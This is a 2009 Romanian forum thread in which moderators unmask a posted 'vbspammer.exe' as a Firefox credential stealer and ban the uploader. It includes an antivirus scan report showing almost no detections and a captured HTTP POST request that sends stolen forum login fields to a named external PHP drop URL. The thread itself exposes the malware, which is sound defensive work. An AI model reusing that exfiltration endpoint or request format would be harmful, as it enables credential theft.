plush Posted March 15, 2009 Report Posted March 15, 2009 (edited) File InfoReport generated: 17.12.2008 at 12.48.23 (GMT 1)Filename: vbspammer.exeFile size: 252 KBMD5 Hash: 3CB5089A70009FFF83CA25E1D9097742SHA1 Hash: 6BBA2619B7E7BF060649D3A75D2F021E0ED60542Packer detected: Microsoft Visual Basic 5.0 / 6.0Self-Extract Archive: Nothing foundBinder Detector: Nothing foundDetection rate: 1 on 24Detectionsa-squared - Nothing found!Avira AntiVir - Nothing found!Avast - Nothing found!AVG - Nothing found!BitDefender - Nothing found!ClamAV - Nothing found!Comodo - Nothing found!Dr.Web - Nothing found!Ewido - Nothing found!F-PROT 6 - Nothing found!G DATA - Nothing found!IkarusT3 - Nothing found!Kaspersky - Nothing found!McAfee - Nothing found!MHR (Malware Hash Registry) - Nothing found!NOD32 v3 - Nothing found!Norman - Nothing found!Panda - Nothing found!Quick Heal - Nothing found!Solo Antivirus - Nothing found!Sophos - Nothing found!TrendMicro - Nothing found!VBA32 - Malware.VB.64 (paranoid heuristics)Virus Buster - Nothing found!Scan report generated byNoVirusThanks.org Removed - FF Stealer Edited March 15, 2009 by Nytro Quote
CODEX Posted March 15, 2009 Report Posted March 15, 2009 ===== Atentie la pus si la mine pe forum si va zic eu ca e STEALER ==== Quote
Nytro Posted March 15, 2009 Report Posted March 15, 2009 Stealer, banhttp://i41.tinypic.com/4uj8sg.jpg Quote
CODEX Posted March 15, 2009 Report Posted March 15, 2009 ti-am zis eu dar tu cu notepad++ te uiti ? parca cu vb poti vedea si username si parola la FTP la care se conecteaza Quote
Nytro Posted March 15, 2009 Report Posted March 15, 2009 (edited) Imi e lene, se pot lua usor, in cel mai rau caz cu un packet sniffer.Datele se trimit prin POST catre: http://www.infraburo.co.za/documents/system/logs.phpPOST /documents/system/logs.php HTTP/1.0Connection: keep-aliveContent-Type: multipart/form-data; boundary=--------031609160339281Content-Length: 262Host: www.infraburo.co.zaAccept: text/html, */*User-Agent: Mozilla/3.0 (compatible; Indy Library)----------031609160339281Content-Disposition: form-data; name="mata"______________________________<br>http://rstcenter.com<br>vb_login_username = UnTest<br>*newpasswordconfirm = *******<br>______________________________<br>----------031609160339281-- Edited March 15, 2009 by Nytro Quote
eXcEssz0r Posted July 5, 2009 Report Posted July 5, 2009 Nytro , cu notepadul normal ai deschis , sau ai tu altu ? Quote